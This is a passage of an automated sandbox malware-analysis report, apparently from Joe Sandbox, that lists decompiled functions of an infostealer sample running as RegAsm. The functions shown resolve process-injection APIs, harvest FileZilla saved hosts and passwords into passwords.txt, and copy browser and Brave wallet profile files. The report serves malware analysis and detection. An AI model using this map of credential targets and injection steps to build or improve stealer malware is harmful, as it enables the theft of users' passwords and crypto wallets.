96332->96331 96333->96331 96340 6c0fcbe8 GetCurrentProcess TerminateProcess 96334->96340 96339->96328 96341 6c0fb830 96342 6c0fb86e dllmain_crt_process_detach 96341->96342 96343 6c0fb83b 96341->96343 96345 6c0fb840 96342->96345 96344 6c0fb860 dllmain_crt_process_attach 96343->96344 96343->96345 96344->96345 96346 6c0fb9c0 96347 6c0fb9ce dllmain_dispatch 96346->96347 96348 6c0fb9c9 96346->96348 96350 6c0fbef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 96348->96350 96350->96347

                                                        Executed Functions

                                                        Function 0041616A Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 603 41616a-416171 604 416177-4165e4 GetProcAddress * 50 603->604 605 4165e9-416688 LoadLibraryA * 9 603->605 604->605 606 4166f8-4166ff 605->606 607 41668a-4166f3 GetProcAddress * 5 605->607 608 416705-4167b3 GetProcAddress * 8 606->608 609 4167b8-4167bf 606->609 607->606 608->609 610 4167c1-41682a GetProcAddress * 5 609->610 611 41682f-416836 609->611 610->611 612 4168c1-4168c8 611->612 613 41683c-4168bc GetProcAddress * 6 611->613 614 416998-41699f 612->614 615 4168ce-416993 GetProcAddress * 9 612->615 613->612 616 4169a1-416a0a GetProcAddress * 5 614->616 617 416a0f-416a16 614->617 615->614 616->617 618 416a41-416a48 617->618 619 416a18-416a3c GetProcAddress * 2 617->619 620 416a73-416a7a 618->620 621 416a4a-416a6e GetProcAddress * 2 618->621 619->618 622 416a80-416b5a GetProcAddress * 10 620->622 623 416b5f-416b66 620->623 621->620 622->623 624 416b68-416bba GetProcAddress * 4 623->624 625 416bbf-416bc6 623->625 624->625 626 416bc8-416bd5 GetProcAddress 625->626 627 416bda-416be1 625->627 626->627 628 416be3-416c35 GetProcAddress * 4 627->628 629 416c3a-416c41 627->629 628->629 630 416c43-416c4f GetProcAddress 629->630 631 416c54 629->631 630->631
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                        • API String ID: 2238633743-2740034357
                                                        • Opcode ID: 0c48603e573c29cdeed1d9987b05d45c7d3208f41ee30b224f8c384a3c82494a
                                                        • Instruction ID: 9154456e8b42cf9f80ecf4092fe5cc86f69ddcb3fe2c6788916e55c7d414bfb2
                                                        • Opcode Fuzzy Hash: 0c48603e573c29cdeed1d9987b05d45c7d3208f41ee30b224f8c384a3c82494a
                                                        • Instruction Fuzzy Hash: A1520E75526600EFEB165F61FE4A8643FB7F789301314742AF902822B1DBF64865EFA0
                                                        Function 0040B042 Relevance: 72.1, APIs: 31, Strings: 10, Instructions: 339stringmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 636 40b042-40b0d8 call 40e58f call 40f84d call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e5c6 call 4069b4 659 40b46c-40b480 call 40e5fa call 401301 636->659 660 40b0de-40b0ed call 40f896 636->660 660->659 666 40b0f3-40b143 strtok_s call 40e58f * 4 GetProcessHeap HeapAlloc 660->666 676 40b149 666->676 677 40b3db-40b467 lstrlenA call 40e58f call 401324 call 41296a call 40e5fa memset call 40e73f * 4 call 40e5fa * 4 666->677 679 40b14e-40b15c StrStrA 676->679 677->659 681 40b189-40b197 StrStrA 679->681 682 40b15e-40b184 lstrlenA call 40fc61 call 40e64d call 40e5fa 679->682 683 40b199-40b1c5 lstrlenA call 40fc61 call 40e64d call 40e5fa 681->683 684 40b1ca-40b1d8 StrStrA 681->684 682->681 683->684 689 40b205-40b213 StrStrA 684->689 690 40b1da-40b200 lstrlenA call 40fc61 call 40e64d call 40e5fa 684->690 696 40b215-40b25b lstrlenA call 40fc61 call 40e64d call 40e5fa call 40e778 call 406a53 689->696 697 40b286-40b29a call 40e778 lstrlenA 689->697 690->689 696->697 738 40b25d-40b281 call 40e603 call 40e6e6 call 40e64d call 40e5fa 696->738 711 40b2a0-40b2b1 call 40e778 lstrlenA 697->711 712 40b3bf-40b3d5 strtok_s 697->712 711->712 724 40b2b7-40b2c8 call 40e778 lstrlenA 711->724 712->677 712->679 724->712 733 40b2ce-40b2df call 40e778 lstrlenA 724->733 733->712 743 40b2e5-40b3ba lstrcatA * 2 call 40e778 lstrcatA * 2 call 40e778 lstrcatA * 3 call 40e778 lstrcatA * 3 call 40e778 lstrcatA * 3 call 40e603 * 4 733->743 738->697 743->712
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040F84D: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0040F87B
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 004069B4: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00421EE4,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069D2
                                                          • Part of subcall function 004069B4: GetFileSizeEx.KERNEL32(00000000,?,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069E9
                                                          • Part of subcall function 004069B4: LocalAlloc.KERNEL32(00000040,?,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A05
                                                          • Part of subcall function 004069B4: ReadFile.KERNEL32(?,00000000,?,0040B0D3,00000000,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A1F
                                                          • Part of subcall function 004069B4: CloseHandle.KERNEL32(?,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A40
                                                          • Part of subcall function 0040F896: LocalAlloc.KERNEL32(00000040,00411800,ERROR,00421C30,?,004117FF,00000000,00000000), ref: 0040F8AF
                                                        • strtok_s.MSVCRT ref: 0040B0FC
                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,0041E266,0041E266,0041E266,0041E266), ref: 0040B131
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040B138
                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040B154
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B15F
                                                          • Part of subcall function 0040FC61: malloc.MSVCRT ref: 0040FC6A
                                                          • Part of subcall function 0040FC61: strncpy.MSVCRT ref: 0040FC7A
                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040B18F
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B19A
                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040B1D0
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B1DB
                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040B20B
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B216
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B28F
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B2A9
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B2C0
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B2D7
                                                        • lstrcatA.KERNEL32(?,Soft: FileZilla), ref: 0040B2ED
                                                        • lstrcatA.KERNEL32(?,Host: ), ref: 0040B2FB
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040B30D
                                                        • lstrcatA.KERNEL32(?,00421460), ref: 0040B31B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040B32D
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 0040B337
                                                        • lstrcatA.KERNEL32(?,Login: ), ref: 0040B345
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040B357
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 0040B361
                                                        • lstrcatA.KERNEL32(?,Password: ), ref: 0040B36F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040B381
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 0040B38B
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 0040B395
                                                          • Part of subcall function 0040E603: lstrlenA.KERNEL32(?,0000000C,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E60C
                                                          • Part of subcall function 0040E603: lstrcpyA.KERNEL32(00000000,00000000,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E640
                                                        • strtok_s.MSVCRT ref: 0040B3C9
                                                        • lstrlenA.KERNEL32(?), ref: 0040B3DE
                                                        • memset.MSVCRT ref: 0040B424
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                        • API String ID: 433178851-935134978
                                                        • Opcode ID: 1d4678b2ff02f3a9fd54eeec6e9e5c55e55e2a697504d7d74e0df52ba466bb6d
                                                        • Instruction ID: 51b5ab9d910a2aeed672e65083b512a475b5e16bbd7debe642951f827ee6ea05
                                                        • Opcode Fuzzy Hash: 1d4678b2ff02f3a9fd54eeec6e9e5c55e55e2a697504d7d74e0df52ba466bb6d
                                                        • Instruction Fuzzy Hash: 9CC14071900118BADB04FBA2DD46DEE7779EF64305F50083AF402B20E2EF395B15CAA9
                                                        Function 0040B969 Relevance: 41.0, APIs: 18, Strings: 5, Instructions: 742fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2383 40b969-40b9ea call 40e58f call 40e694 call 40e6e6 call 40e64d call 40e5fa * 2 call 40e58f * 2 call 40e778 FindFirstFileA 2402 40b9f0-40b9f6 2383->2402 2403 40c39e-40c3dd call 40e5fa * 3 call 401301 call 40e5fa * 3 2383->2403 2405 40b9fb-40ba0f StrCmpCA 2402->2405 2407 40ba15-40ba29 StrCmpCA 2405->2407 2408 40c37d-40c38f FindNextFileA 2405->2408 2407->2408 2410 40ba2f-40ba9b call 40e603 call 40e694 call 40e6e6 * 2 call 40e64d call 40e5fa * 3 2407->2410 2408->2405 2411 40c395-40c398 FindClose 2408->2411 2439 40baa1-40bac0 call 40e778 StrCmpCA 2410->2439 2440 40bbab-40bc16 call 40e6e6 * 4 call 40e64d call 40e5fa * 3 2410->2440 2411->2403 2445 40bac2-40bb33 call 40e6e6 * 4 call 40e64d call 40e5fa * 3 2439->2445 2446 40bb38-40bba9 call 40e6e6 * 4 call 40e64d call 40e5fa * 3 2439->2446 2489 40bc1c-40bc3a call 40e5fa call 40e778 StrCmpCA 2440->2489 2445->2489 2446->2489 2498 40bc40-40bc54 StrCmpCA 2489->2498 2499 40bdec-40be01 StrCmpCA 2489->2499 2498->2499 2500 40bc5a-40bd7c call 40e58f call 40f6c3 call 40e6e6 call 40e694 call 40e6e6 call 40e694 call 40e64d call 40e5fa * 5 call 40e778 * 2 call 40e58f call 40e6e6 * 2 call 40e64d call 40e5fa * 2 call 40e5c6 call 4069b4 2498->2500 2501 40be03-40be4a call 401324 call 40e5c6 * 3 call 40b5f7 2499->2501 2502 40be5a-40be6f StrCmpCA 2499->2502 2707 40bdbd-40bde7 call 40e778 call 40e73f call 40e778 call 40e5fa * 2 2500->2707 2708 40bd7e-40bdb8 call 40e5c6 call 401324 call 41296a call 40e5fa 2500->2708 2562 40be4f-40be55 2501->2562 2503 40be71-40be88 call 40e778 StrCmpCA 2502->2503 2504 40bed7-40beef call 40e5c6 call 40f81d 2502->2504 2515 40c308-40c30f 2503->2515 2516 40be8e-40be92 2503->2516 2527 40bef1-40bef5 2504->2527 2528 40bf56-40bf6b StrCmpCA 2504->2528 2524 40c311-40c362 call 40e5c6 * 2 call 40e58f call 401324 call 40b969 2515->2524 2525 40c36d-40c378 call 40e73f * 2 2515->2525 2516->2515 2521 40be98-40bed5 call 401324 call 40e5c6 * 2 2516->2521 2573 40bf3b-40bf46 call 40e5c6 call 406e2d 2521->2573 2588 40c367 2524->2588 2525->2408 2527->2515 2534 40befb-40bf38 call 401324 call 40e5c6 call 40e58f 2527->2534 2539 40bf71-40c02d call 40e58f call 40f6c3 call 40e6e6 call 40e694 call 40e6e6 call 40e694 call 40e64d call 40e5fa * 5 call 40e778 * 2 CopyFileA 2528->2539 2540 40c166-40c17b StrCmpCA 2528->2540 2534->2573 2653 40c033-40c0d3 call 401324 call 40e5c6 * 3 call 40737e call 401324 call 40e5c6 * 3 call 407bc2 2539->2653 2654 40c0d9-40c0f2 call 40e778 StrCmpCA 2539->2654 2540->2515 2544 40c181-40c23d call 40e58f call 40f6c3 call 40e6e6 call 40e694 call 40e6e6 call 40e694 call 40e64d call 40e5fa * 5 call 40e778 * 2 CopyFileA 2540->2544 2655 40c243-40c28b call 401324 call 40e5c6 * 3 call 40765c 2544->2655 2656 40c2e9-40c2fb call 40e778 DeleteFileA call 40e73f 2544->2656 2562->2515 2594 40bf4b-40bf51 2573->2594 2588->2525 2594->2515 2653->2654 2666 40c0f4-40c141 call 401324 call 40e5c6 * 3 call 4080b5 2654->2666 2667 40c147-40c159 call 40e778 DeleteFileA call 40e73f 2654->2667 2710 40c290-40c2e3 call 401324 call 40e5c6 * 3 call 4078d2 2655->2710 2682 40c300 2656->2682 2666->2667 2689 40c15e-40c161 2667->2689 2688 40c303 call 40e5fa 2682->2688 2688->2515 2689->2688 2707->2499 2708->2707 2710->2656
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • FindFirstFileA.KERNEL32(00000000,?,0041E266,0041E266,00000000,?,?,?,004214CC,0041E266,00000000,0041E266,?), ref: 0040B9DE
                                                        • StrCmpCA.SHLWAPI(?,0041E258), ref: 0040BA07
                                                        • StrCmpCA.SHLWAPI(?,0041E254), ref: 0040BA21
                                                          • Part of subcall function 0040E603: lstrlenA.KERNEL32(?,0000000C,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E60C
                                                          • Part of subcall function 0040E603: lstrcpyA.KERNEL32(00000000,00000000,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E640
                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,0041E264,?,?,0041E266), ref: 0040BAB2
                                                        • StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,0041E264,?,?,0041E264,?,00000000,?,?,?,0041E264,?,?), ref: 0040BC32
                                                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040BC4C
                                                        • StrCmpCA.SHLWAPI(?), ref: 0040BDF9
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 0040B5F7: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,0041E264,?,00000000,0041E266,0041E266), ref: 0040B6B3
                                                          • Part of subcall function 0040B5F7: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040B70A
                                                          • Part of subcall function 0040B5F7: RtlAllocateHeap.NTDLL(00000000), ref: 0040B711
                                                          • Part of subcall function 0040B969: StrCmpCA.SHLWAPI(?), ref: 0040BE67
                                                          • Part of subcall function 0040B969: StrCmpCA.SHLWAPI(00000000), ref: 0040BE80
                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040C387
                                                        • FindClose.KERNEL32(?), ref: 0040C398
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileFind$Heaplstrcatlstrlen$AllocateCloseCopyFirstNextProcess
                                                        • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                        • API String ID: 780276101-1189830961
                                                        • Opcode ID: 78f0d21e98bd3208d3c5bc27105ea4800e154e10e15dcc1beb1762b7346098a6
                                                        • Instruction ID: cd97d4f61a1e0b8bef2f45c608ca5c59a8d6b2ecd0916db8e4c1ee1465d1ff5c
                                                        • Opcode Fuzzy Hash: 78f0d21e98bd3208d3c5bc27105ea4800e154e10e15dcc1beb1762b7346098a6
                                                        • Instruction Fuzzy Hash: AC525C71900118ABCF24FBB2DC56EED7778AF14308F40097AF806B21D2EE395A59CB95
                                                        Function 00413540 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 292stringfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2750 413540-4135a9 call 41a550 wsprintfA FindFirstFileA memset * 2 2753 413905-413911 call 401301 2750->2753 2754 4135af 2750->2754 2755 4135b4-4135c8 StrCmpCA 2754->2755 2757 4138e4-4138f6 FindNextFileA 2755->2757 2758 4135ce-4135e2 StrCmpCA 2755->2758 2757->2755 2761 4138fc-4138ff FindClose 2757->2761 2758->2757 2760 4135e8-413624 wsprintfA StrCmpCA 2758->2760 2762 413640-41364f wsprintfA 2760->2762 2763 413626-41363e wsprintfA 2760->2763 2761->2753 2764 413652-41367f memset lstrcatA 2762->2764 2763->2764 2765 41369e-4136a8 strtok_s 2764->2765 2766 413681-413692 2765->2766 2767 4136aa-4136da memset lstrcatA 2765->2767 2772 413872-413878 2766->2772 2775 413698-41369d 2766->2775 2768 4137e5-4137ef strtok_s 2767->2768 2769 4137f5 2768->2769 2770 4136df-4136ef PathMatchSpecA 2768->2770 2769->2772 2773 4136f5-4137c6 call 40e58f call 40f6c3 call 40e6e6 call 40e694 call 40e6e6 call 40e694 call 40e64d call 40e5fa * 5 call 40e778 * 3 call 40fa3b call 41a5d0 2770->2773 2774 4137df-4137e4 2770->2774 2772->2757 2776 41387a-413886 2772->2776 2819 4137f7-413806 2773->2819 2820 4137c8-4137da call 40e778 call 40e5fa 2773->2820 2774->2768 2775->2765 2776->2761 2778 413888-413890 2776->2778 2778->2757 2780 413892-4138d9 call 401324 call 413540 2778->2780 2788 4138de 2780->2788 2788->2757 2821 413912-41391a call 40e5fa 2819->2821 2822 41380c-41382c call 40e5c6 call 4069b4 2819->2822 2820->2774 2821->2753 2833 41386a-41386d call 40e5fa 2822->2833 2834 41382e-413865 call 40e58f call 401324 call 41296a call 40e5fa 2822->2834 2833->2772 2834->2833
                                                        APIs
                                                        • wsprintfA.USER32 ref: 0041355F
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00413576
                                                        • memset.MSVCRT ref: 0041358F
                                                        • memset.MSVCRT ref: 0041359D
                                                        • StrCmpCA.SHLWAPI(?,0041E258), ref: 004135C0
                                                        • StrCmpCA.SHLWAPI(?,0041E254), ref: 004135DA
                                                        • wsprintfA.USER32 ref: 004135FE
                                                        • StrCmpCA.SHLWAPI(?,0041E266), ref: 0041360F
                                                        • wsprintfA.USER32 ref: 00413635
                                                        • wsprintfA.USER32 ref: 00413649
                                                        • memset.MSVCRT ref: 0041365B
                                                        • lstrcatA.KERNEL32(?,?), ref: 0041366D
                                                        • strtok_s.MSVCRT ref: 0041369E
                                                        • memset.MSVCRT ref: 004136B3
                                                        • lstrcatA.KERNEL32(?,?), ref: 004136C8
                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004136E7
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040F6C3: GetSystemTime.KERNEL32(00000000,0041E266,0041E266,00421EE4,00000000), ref: 0040F6EC
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040FA3B: CreateFileA.KERNEL32(004137B2,80000000,00000003,00000000,00000003,00000080,00000000,00421D9C,?,?,?,004137B2,00000000), ref: 0040FA56
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004137BB
                                                        • strtok_s.MSVCRT ref: 004137E5
                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 004138EE
                                                        • FindClose.KERNEL32(000000FF), ref: 004138FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
